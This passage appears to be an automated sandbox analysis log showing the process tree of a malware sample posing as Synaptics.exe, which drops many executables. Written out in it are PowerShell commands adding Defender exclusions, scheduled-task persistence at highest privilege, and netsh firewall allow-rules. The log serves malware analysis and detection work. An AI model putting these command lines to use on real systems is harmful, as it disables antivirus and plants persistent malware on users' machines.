  - - C:\Users\Admin\AppData\Local\Temp\Files\kdmapper_Release.exe
      "C:\Users\Admin\AppData\Local\Temp\Files\kdmapper_Release.exe"
      4⤵
      PID:6276

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\ProgramData\Synaptics\Synaptics.exe
1⤵
- Suspicious use of WriteProcessMemory
PID:4976
- C:\ProgramData\Synaptics\Synaptics.exe
  C:\ProgramData\Synaptics\Synaptics.exe
  2⤵
  - Executes dropped EXE
  - Drops file in System32 directory
  - System Location Discovery: System Language Discovery
  - Modifies registry class
  - Suspicious use of WriteProcessMemory
  PID:708
- - C:\Windows\SysWOW64\._cache_Synaptics.exe
    "C:\Windows\system32\._cache_Synaptics.exe"
    3⤵
    - Downloads MZ/PE file
    - Executes dropped EXE
    - Drops file in System32 directory
    - System Location Discovery: System Language Discovery
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:5708
  - - C:\Windows\SysWOW64\Files\thin.exe
      "C:\Windows\System32\Files\thin.exe"
      4⤵
      Executes dropped EXE
      System Location Discovery: System Language Discovery
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      PID:5712
    - - C:\Windows\SysWOW64\schtasks.exe
        
        "schtasks" /create /tn "Driver689" /sc ONLOGON /tr "C:\Windows\SysWOW64\Files\thin.exe" /rl HIGHEST /f
        5⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:5616
    - - C:\Users\Admin\AppData\Roaming\temp\Client.exe
        
        "C:\Users\Admin\AppData\Roaming\temp\Client.exe"
        5⤵
        
        PID:5024
      - C:\Windows\SysWOW64\schtasks.exe
        
        "schtasks" /create /tn "Driver689" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\temp\Client.exe" /rl HIGHEST /f
        6⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:2032
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" -WindowStyle Hidden -Command "Add-MpPreference -ExclusionPath (Get-Item -LiteralPath $env:SystemRoot).Root"
        5⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:6064
    - - C:\Windows\SysWOW64\ipconfig.exe
        
        "C:\Windows\System32\ipconfig.exe" /flushdns
        5⤵
        Gathers network information
        
        PID:3648
    - - C:\Windows\SysWOW64\SCHTASKS.exe
        
        "SCHTASKS.exe" /create /tn "$77thin.exe" /tr "'C:\Windows\SysWOW64\Files\thin.exe'" /sc onlogon /rl HIGHEST
        5⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:2312
  - - C:\Windows\SysWOW64\Files\diskutil.exe
      "C:\Windows\System32\Files\diskutil.exe"
      4⤵
      PID:5968
  - - C:\Windows\SysWOW64\Files\fusca%20game.exe
      "C:\Windows\System32\Files\fusca%20game.exe"
      4⤵
      PID:5424
    - - C:\Windows\SysWOW64\netsh.exe
        
        netsh firewall add allowedprogram "C:\Windows\SysWOW64\Files\fusca%20game.exe" "fusca%20game.exe" ENABLE
        5⤵
        Modifies Windows Firewall
        
        PID:7128
  - - C:\Windows\SysWOW64\Files\32.exe
      "C:\Windows\System32\Files\32.exe"
      4⤵
      PID:2352
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 2352 -s 352
        5⤵
        Program crash
        
        PID:3024
  - - C:\Windows\SysWOW64\Files\XClient.exe
      "C:\Windows\System32\Files\XClient.exe"
      4⤵
      PID:1552
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Windows\SysWOW64\Files\XClient.exe'
        5⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:6668
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'XClient.exe'
        5⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:6316
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\ProgramData\Desktop Window Manager.exe'
        5⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:6892
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Desktop Window Manager.exe'
        5⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:7180
    - - C:\Windows\System32\schtasks.exe
        
        "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Desktop Window Manager" /tr "C:\ProgramData\Desktop Window Manager.exe"
        5⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:6936
  - - C:\Windows\SysWOW64\Files\LauncherLoader.exe
      "C:\Windows\System32\Files\LauncherLoader.exe"
      4⤵
      PID:5272
    - - C:\INDESK\NewkeyLauncher.exe
        
        "C:\INDESK\NewkeyLauncher.exe"
        5⤵
        
        PID:7048
  - - C:\Windows\SysWOW64\Files\setup.exe
      "C:\Windows\System32\Files\setup.exe"
      4⤵
      PID:6560
  - - C:\Windows\SysWOW64\Files\Client-Built.exe
      "C:\Windows\System32\Files\Client-Built.exe"
      4⤵
      PID:7140
  - - C:\Windows\SysWOW64\Files\Server.exe
      "C:\Windows\System32\Files\Server.exe"
      4⤵
      PID:7224
    - - C:\Users\Admin\server.exe
        
        "C:\Users\Admin\server.exe"
        5⤵
        
        PID:6484
      - C:\Windows\SysWOW64\netsh.exe
        
        netsh firewall add allowedprogram "C:\Users\Admin\server.exe" "server.exe" ENABLE
        6⤵
        Modifies Windows Firewall
        
        PID:2304
  - - C:\Windows\SysWOW64\Files\writedat.exe
      "C:\Windows\System32\Files\writedat.exe"
      4⤵
      PID:2068
  - - C:\Windows\SysWOW64\Files\Server1.exe
      "C:\Windows\System32\Files\Server1.exe"
      4⤵
      PID:8488
    - - C:\Windows\SysWOW64\netsh.exe
        
        netsh firewall add allowedprogram "C:\Windows\SysWOW64\Files\Server1.exe" "Server1.exe" ENABLE
        5⤵
        Modifies Windows Firewall
        
        PID:9196
  - - C:\Windows\SysWOW64\Files\winbox.exe
      "C:\Windows\System32\Files\winbox.exe"
      4⤵
      PID:7188
  - - C:\Windows\SysWOW64\Files\TPB-ACTIVATOR-1.exe
      "C:\Windows\System32\Files\TPB-ACTIVATOR-1.exe"
      4⤵
      PID:7836

C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE
"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" /automation -Embedding
1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
PID:2396

C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\elevation_service.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\elevation_service.exe"
1⤵
PID:1252

C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
1⤵
PID:5032

C:\Program Files\Google\Chrome\Application\133.0.6943.60\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\133.0.6943.60\elevation_service.exe"
1⤵
PID:2480

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --no-startup-window --win-session-start
1⤵
PID:3192
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --no-startup-window --win-session-start
  2⤵
  PID:2304

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 2352 -ip 2352
1⤵
PID:2892

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 512 -p 6760 -ip 6760
1⤵
PID:7068

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Windows\SysWOW64\Files\fusca%20game.exe" ..
1⤵
PID:7144
- C:\Windows\SysWOW64\Files\fusca%20game.exe
  C:\Windows\SysWOW64\Files\fusca%20game.exe ..
  2⤵
  PID:5904

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Windows\SysWOW64\Files\fusca%20game.exe" ..
1⤵
PID:7152
- C:\Windows\SysWOW64\Files\fusca%20game.exe
  C:\Windows\SysWOW64\Files\fusca%20game.exe ..
  2⤵
  PID:6256

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Windows\SysWOW64\Files\fusca%20game.exe" ..
1⤵
PID:6916
- C:\Windows\SysWOW64\Files\fusca%20game.exe
  C:\Windows\SysWOW64\Files\fusca%20game.exe ..
  2⤵
  PID:6868

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Windows\SysWOW64\Files\fusca%20game.exe" ..
1⤵
PID:6924
- C:\Windows\SysWOW64\Files\fusca%20game.exe
  C:\Windows\SysWOW64\Files\fusca%20game.exe ..
  2⤵
  PID:6864

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Windows\SysWOW64\Files\fusca%20game.exe" ..
1⤵
PID:6192
- C:\Windows\SysWOW64\Files\fusca%20game.exe
  C:\Windows\SysWOW64\Files\fusca%20game.exe ..
  2⤵
  PID:6700

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Windows\SysWOW64\Files\fusca%20game.exe" ..
1⤵
PID:5352
- C:\Windows\SysWOW64\Files\fusca%20game.exe
  C:\Windows\SysWOW64\Files\fusca%20game.exe ..
  2⤵
  PID:6484

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Windows\SysWOW64\Files\fusca%20game.exe" ..
1⤵
PID:7016
- C:\Windows\SysWOW64\Files\fusca%20game.exe
  C:\Windows\SysWOW64\Files\fusca%20game.exe ..
  2⤵
  PID:7012

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Windows\SysWOW64\Files\fusca%20game.exe" ..
1⤵
PID:6876
- C:\Windows\SysWOW64\Files\fusca%20game.exe
  C:\Windows\SysWOW64\Files\fusca%20game.exe ..
  2⤵
  PID:7036

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Windows\SysWOW64\Files\fusca%20game.exe" ..
1⤵
PID:7428
- C:\Windows\SysWOW64\Files\fusca%20game.exe
  C:\Windows\SysWOW64\Files\fusca%20game.exe ..
  2⤵
  PID:7608

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Windows\SysWOW64\Files\fusca%20game.exe" ..
1⤵
PID:7436
- C:\Windows\SysWOW64\Files\fusca%20game.exe
  C:\Windows\SysWOW64\Files\fusca%20game.exe ..
  2⤵
  PID:7588

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Windows\SysWOW64\Files\fusca%20game.exe" ..
1⤵
PID:7760
- C:\Windows\SysWOW64\Files\fusca%20game.exe
  C:\Windows\SysWOW64\Files\fusca%20game.exe ..
  2⤵
  PID:8068

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Windows\SysWOW64\Files\fusca%20game.exe" ..
1⤵
PID:7768
- C:\Windows\SysWOW64\Files\fusca%20game.exe
  C:\Windows\SysWOW64\Files\fusca%20game.exe ..
  2⤵
  PID:8060

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Windows\SysWOW64\Files\fusca%20game.exe" ..
1⤵
PID:6596
- C:\Windows\SysWOW64\Files\fusca%20game.exe
  C:\Windows\SysWOW64\Files\fusca%20game.exe ..
  2⤵
  PID:7356

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Windows\SysWOW64\Files\fusca%20game.exe" ..
1⤵
PID:7172
- C:\Windows\SysWOW64\Files\fusca%20game.exe
  C:\Windows\SysWOW64\Files\fusca%20game.exe ..
  2⤵
  PID:7324

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Windows\SysWOW64\Files\fusca%20game.exe" ..
1⤵
PID:7684
- C:\Windows\SysWOW64\Files\fusca%20game.exe
  C:\Windows\SysWOW64\Files\fusca%20game.exe ..
  2⤵
  PID:7228

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Windows\SysWOW64\Files\fusca%20game.exe" ..
1⤵
PID:7692
- C:\Windows\SysWOW64\Files\fusca%20game.exe
  C:\Windows\SysWOW64\Files\fusca%20game.exe ..
  2⤵
  PID:7400

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Windows\SysWOW64\Files\fusca%20game.exe" ..
1⤵
PID:5272
- C:\Windows\SysWOW64\Files\fusca%20game.exe
  C:\Windows\SysWOW64\Files\fusca%20game.exe ..
  2⤵
  PID:8180

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Windows\SysWOW64\Files\fusca%20game.exe" ..
1⤵
PID:3228
- C:\Windows\SysWOW64\Files\fusca%20game.exe
  C:\Windows\SysWOW64\Files\fusca%20game.exe ..
  2⤵
  PID:6400

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\ProgramData\Desktop Window Manager.exe
1⤵
PID:6940

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Windows\SysWOW64\Files\fusca%20game.exe" ..
1⤵
PID:7704
- C:\Windows\SysWOW64\Files\fusca%20game.exe
  C:\Windows\SysWOW64\Files\fusca%20game.exe ..
  2⤵
  PID:7580

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Windows\SysWOW64\Files\fusca%20game.exe" ..
1⤵
PID:2132
- C:\Windows\SysWOW64\Files\fusca%20game.exe
  C:\Windows\SysWOW64\Files\fusca%20game.exe ..
  2⤵
  PID:6716

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Windows\SysWOW64\Files\fusca%20game.exe" ..
1⤵
PID:7884
- C:\Windows\SysWOW64\Files\fusca%20game.exe
  C:\Windows\SysWOW64\Files\fusca%20game.exe ..
  2⤵
  PID:5352

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Windows\SysWOW64\Files\fusca%20game.exe" ..
1⤵
PID:7868
- C:\Windows\SysWOW64\Files\fusca%20game.exe
  C:\Windows\SysWOW64\Files\fusca%20game.exe ..
  2⤵
  PID:7944

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 536 -p 2640 -ip 2640
1⤵
PID:6812

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Windows\SysWOW64\Files\fusca%20game.exe" ..
1⤵
PID:6844
- C:\Windows\SysWOW64\Files\fusca%20game.exe
  C:\Windows\SysWOW64\Files\fusca%20game.exe ..
  2⤵
  PID:7588

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Windows\SysWOW64\Files\fusca%20game.exe" ..
1⤵
PID:6692
- C:\Windows\SysWOW64\Files\fusca%20game.exe
  C:\Windows\SysWOW64\Files\fusca%20game.exe ..
  2⤵
  PID:6556

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\XClient.exe
1⤵
PID:6268
- C:\Users\Admin\AppData\Roaming\XClient.exe
  C:\Users\Admin\AppData\Roaming\XClient.exe
  2⤵
  PID:7440

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Windows\SysWOW64\Files\fusca%20game.exe" ..
1⤵
PID:7496
- C:\Windows\SysWOW64\Files\fusca%20game.exe
  C:\Windows\SysWOW64\Files\fusca%20game.exe ..
  2⤵
  PID:6272

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Windows\SysWOW64\Files\fusca%20game.exe" ..
1⤵
PID:7460
- C:\Windows\SysWOW64\Files\fusca%20game.exe
  C:\Windows\SysWOW64\Files\fusca%20game.exe ..
  2⤵
  PID:7932

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Windows\SysWOW64\Files\fusca%20game.exe" ..
1⤵
PID:6208
- C:\Windows\SysWOW64\Files\fusca%20game.exe
  C:\Windows\SysWOW64\Files\fusca%20game.exe ..
  2⤵
  PID:6604

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Windows\SysWOW64\Files\fusca%20game.exe" ..
1⤵
PID:7812
- C:\Windows\SysWOW64\Files\fusca%20game.exe
  C:\Windows\SysWOW64\Files\fusca%20game.exe ..
  2⤵
  PID:6616

C:\Users\Admin\AppData\Roaming\PowerShell.exe
C:\Users\Admin\AppData\Roaming\PowerShell.exe
1⤵
PID:6148

C:\Users\Admin\AppData\Roaming\XClient.exe
C:\Users\Admin\AppData\Roaming\XClient.exe
1⤵
PID:6300

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Windows\SysWOW64\Files\fusca%20game.exe" ..
1⤵
PID:7948
- C:\Windows\SysWOW64\Files\fusca%20game.exe
  C:\Windows\SysWOW64\Files\fusca%20game.exe ..
  2⤵
  PID:7836

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Windows\SysWOW64\Files\fusca%20game.exe" ..
1⤵
PID:7940
- C:\Windows\SysWOW64\Files\fusca%20game.exe
  C:\Windows\SysWOW64\Files\fusca%20game.exe ..
  2⤵
  PID:8128

C:\ProgramData\Desktop Window Manager.exe
"C:\ProgramData\Desktop Window Manager.exe"
1⤵
PID:6572

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Windows\SysWOW64\Files\fusca%20game.exe" ..
1⤵
PID:3860
- C:\Windows\SysWOW64\Files\fusca%20game.exe
  C:\Windows\SysWOW64\Files\fusca%20game.exe ..
  2⤵
  PID:7324

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Windows\SysWOW64\Files\fusca%20game.exe" ..
1⤵
PID:7336
- C:\Windows\SysWOW64\Files\fusca%20game.exe
  C:\Windows\SysWOW64\Files\fusca%20game.exe ..
  2⤵
  PID:7380

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Windows\SysWOW64\Files\fusca%20game.exe" ..
1⤵
PID:7472
- C:\Windows\SysWOW64\Files\fusca%20game.exe
  C:\Windows\SysWOW64\Files\fusca%20game.exe ..
  2⤵
  PID:7728

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Windows\SysWOW64\Files\fusca%20game.exe" ..
1⤵
PID:6244
- C:\Windows\SysWOW64\Files\fusca%20game.exe
  C:\Windows\SysWOW64\Files\fusca%20game.exe ..
  2⤵
  PID:6184

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Windows\SysWOW64\Files\fusca%20game.exe" ..
1⤵
PID:6800
- C:\Windows\SysWOW64\Files\fusca%20game.exe
  C:\Windows\SysWOW64\Files\fusca%20game.exe ..
  2⤵
  PID:7208

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Windows\SysWOW64\Files\fusca%20game.exe" ..
1⤵
PID:2980
- C:\Windows\SysWOW64\Files\fusca%20game.exe
  C:\Windows\SysWOW64\Files\fusca%20game.exe ..
  2⤵
  PID:6164

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Windows\SysWOW64\Files\fusca%20game.exe" ..
1⤵
PID:6400
- C:\Windows\SysWOW64\Files\fusca%20game.exe
  C:\Windows\SysWOW64\Files\fusca%20game.exe ..
  2⤵
  PID:8036

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Windows\SysWOW64\Files\fusca%20game.exe" ..
1⤵
PID:6152
- C:\Windows\SysWOW64\Files\fusca%20game.exe
  C:\Windows\SysWOW64\Files\fusca%20game.exe ..
  2⤵
  PID:6724

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Windows\SysWOW64\Files\fusca%20game.exe" ..
1⤵
PID:7544
- C:\Windows\SysWOW64\Files\fusca%20game.exe
  C:\Windows\SysWOW64\Files\fusca%20game.exe ..
  2⤵
  PID:6780

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Windows\SysWOW64\Files\fusca%20game.exe" ..
1⤵
PID:7704
- C:\Windows\SysWOW64\Files\fusca%20game.exe
  C:\Windows\SysWOW64\Files\fusca%20game.exe ..
  2⤵
  PID:7592

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Windows\SysWOW64\Files\fusca%20game.exe" ..
1⤵
PID:6280
- C:\Windows\SysWOW64\Files\fusca%20game.exe
  C:\Windows\SysWOW64\Files\fusca%20game.exe ..
  2⤵
  PID:7616

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Windows\SysWOW64\Files\fusca%20game.exe" ..
1⤵
PID:7968
- C:\Windows\SysWOW64\Files\fusca%20game.exe
  C:\Windows\SysWOW64\Files\fusca%20game.exe ..
  2⤵
  PID:7860

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Windows\SysWOW64\Files\fusca%20game.exe" ..
1⤵
PID:7680
- C:\Windows\SysWOW64\Files\fusca%20game.exe
  C:\Windows\SysWOW64\Files\fusca%20game.exe ..
  2⤵
  PID:7588

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Windows\SysWOW64\Files\fusca%20game.exe" ..
1⤵
PID:7504
- C:\Windows\SysWOW64\Files\fusca%20game.exe
  C:\Windows\SysWOW64\Files\fusca%20game.exe ..
  2⤵
  PID:6556

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Windows\SysWOW64\Files\fusca%20game.exe" ..
1⤵
PID:7464
- C:\Windows\SysWOW64\Files\fusca%20game.exe
  C:\Windows\SysWOW64\Files\fusca%20game.exe ..
  2⤵
  PID:7576

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Windows\SysWOW64\Files\fusca%20game.exe" ..
1⤵
PID:6920
- C:\Windows\SysWOW64\Files\fusca%20game.exe
  C:\Windows\SysWOW64\Files\fusca%20game.exe ..
  2⤵
  PID:8176

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Windows\SysWOW64\Files\fusca%20game.exe" ..
1⤵
PID:6240
- C:\Windows\SysWOW64\Files\fusca%20game.exe
  C:\Windows\SysWOW64\Files\fusca%20game.exe ..
  2⤵
  PID:4120

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Windows\SysWOW64\Files\fusca%20game.exe" ..
1⤵
PID:7500
- C:\Windows\SysWOW64\Files\fusca%20game.exe
  C:\Windows\SysWOW64\Files\fusca%20game.exe ..
  2⤵
  PID:6472

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Windows\SysWOW64\Files\fusca%20game.exe" ..
1⤵
PID:6344
- C:\Windows\SysWOW64\Files\fusca%20game.exe
  C:\Windows\SysWOW64\Files\fusca%20game.exe ..
  2⤵
  PID:5116

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Windows\SysWOW64\Files\fusca%20game.exe" ..
1⤵
PID:8100
- C:\Windows\SysWOW64\Files\fusca%20game.exe
  C:\Windows\SysWOW64\Files\fusca%20game.exe ..
  2⤵
  PID:6904

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Windows\SysWOW64\Files\fusca%20game.exe" ..
1⤵
PID:7712
- C:\Windows\SysWOW64\Files\fusca%20game.exe
  C:\Windows\SysWOW64\Files\fusca%20game.exe ..
  2⤵
  PID:7180

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Windows\SysWOW64\Files\fusca%20game.exe" ..
1⤵
PID:7396
- C:\Windows\SysWOW64\Files\fusca%20game.exe
  C:\Windows\SysWOW64\Files\fusca%20game.exe ..
  2⤵
  PID:6924

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Windows\SysWOW64\Files\fusca%20game.exe" ..
1⤵
PID:6540
- C:\Windows\SysWOW64\Files\fusca%20game.exe
  C:\Windows\SysWOW64\Files\fusca%20game.exe ..
  2⤵
  PID:4008

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Windows\SysWOW64\Files\fusca%20game.exe" ..
1⤵
PID:7756
- C:\Windows\SysWOW64\Files\fusca%20game.exe
  C:\Windows\SysWOW64\Files\fusca%20game.exe ..
  2⤵
  PID:2640

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Windows\SysWOW64\Files\fusca%20game.exe" ..
1⤵
PID:7384
- C:\Windows\SysWOW64\Files\fusca%20game.exe
  C:\Windows\SysWOW64\Files\fusca%20game.exe ..
  2⤵
  PID:3460

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Windows\SysWOW64\Files\fusca%20game.exe" ..
1⤵
PID:7632
- C:\Windows\SysWOW64\Files\fusca%20game.exe
  C:\Windows\SysWOW64\Files\fusca%20game.exe ..
  2⤵
  PID:4036

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Windows\SysWOW64\Files\fusca%20game.exe" ..
1⤵
PID:7192
- C:\Windows\SysWOW64\Files\fusca%20game.exe
  C:\Windows\SysWOW64\Files\fusca%20game.exe ..
  2⤵
  PID:7060

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Windows\SysWOW64\Files\fusca%20game.exe" ..
1⤵
PID:7368
- C:\Windows\SysWOW64\Files\fusca%20game.exe
  C:\Windows\SysWOW64\Files\fusca%20game.exe ..
  2⤵
  PID:7048

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Windows\SysWOW64\Files\fusca%20game.exe" ..
1⤵
PID:7236
- C:\Windows\SysWOW64\Files\fusca%20game.exe
  C:\Windows\SysWOW64\Files\fusca%20game.exe ..
  2⤵
  PID:6768

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Windows\SysWOW64\Files\fusca%20game.exe" ..
1⤵
PID:6988
- C:\Windows\SysWOW64\Files\fusca%20game.exe
  C:\Windows\SysWOW64\Files\fusca%20game.exe ..
  2⤵
  PID:8140

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Windows\SysWOW64\Files\fusca%20game.exe" ..
1⤵
PID:2868
- C:\Windows\SysWOW64\Files\fusca%20game.exe
  C:\Windows\SysWOW64\Files\fusca%20game.exe ..
  2⤵
  PID:7948

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Windows\SysWOW64\Files\fusca%20game.exe" ..
1⤵
PID:4388
- C:\Windows\SysWOW64\Files\fusca%20game.exe
  C:\Windows\SysWOW64\Files\fusca%20game.exe ..
  2⤵
  PID:7620

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Windows\SysWOW64\Files\fusca%20game.exe" ..
1⤵
PID:7816
- C:\Windows\SysWOW64\Files\fusca%20game.exe
  C:\Windows\SysWOW64\Files\fusca%20game.exe ..
  2⤵
  PID:7588

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Windows\SysWOW64\Files\fusca%20game.exe" ..
1⤵
PID:7004
- C:\Windows\SysWOW64\Files\fusca%20game.exe
  C:\Windows\SysWOW64\Files\fusca%20game.exe ..
  2⤵
  PID:7380

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Windows\SysWOW64\Files\fusca%20game.exe" ..
1⤵
PID:7064
- C:\Windows\SysWOW64\Files\fusca%20game.exe
  C:\Windows\SysWOW64\Files\fusca%20game.exe ..
  2⤵
  PID:332

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Windows\SysWOW64\Files\fusca%20game.exe" ..
1⤵
PID:8164
- C:\Windows\SysWOW64\Files\fusca%20game.exe
  C:\Windows\SysWOW64\Files\fusca%20game.exe ..
  2⤵
  PID:8176

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Windows\SysWOW64\Files\fusca%20game.exe" ..
1⤵
PID:6920
- C:\Windows\SysWOW64\Files\fusca%20game.exe
  C:\Windows\SysWOW64\Files\fusca%20game.exe ..
  2⤵
  PID:7144

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Windows\SysWOW64\Files\fusca%20game.exe" ..
1⤵
PID:6340
- C:\Windows\SysWOW64\Files\fusca%20game.exe
  C:\Windows\SysWOW64\Files\fusca%20game.exe ..
  2⤵
  PID:4244

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Windows\SysWOW64\Files\fusca%20game.exe" ..
1⤵
PID:6612
- C:\Windows\SysWOW64\Files\fusca%20game.exe
  C:\Windows\SysWOW64\Files\fusca%20game.exe ..
  2⤵
  PID:7244

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Windows\SysWOW64\Files\fusca%20game.exe" ..
1⤵
PID:3020
- C:\Windows\SysWOW64\Files\fusca%20game.exe
  C:\Windows\SysWOW64\Files\fusca%20game.exe ..
  2⤵
  PID:7936

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Windows\SysWOW64\Files\fusca%20game.exe" ..
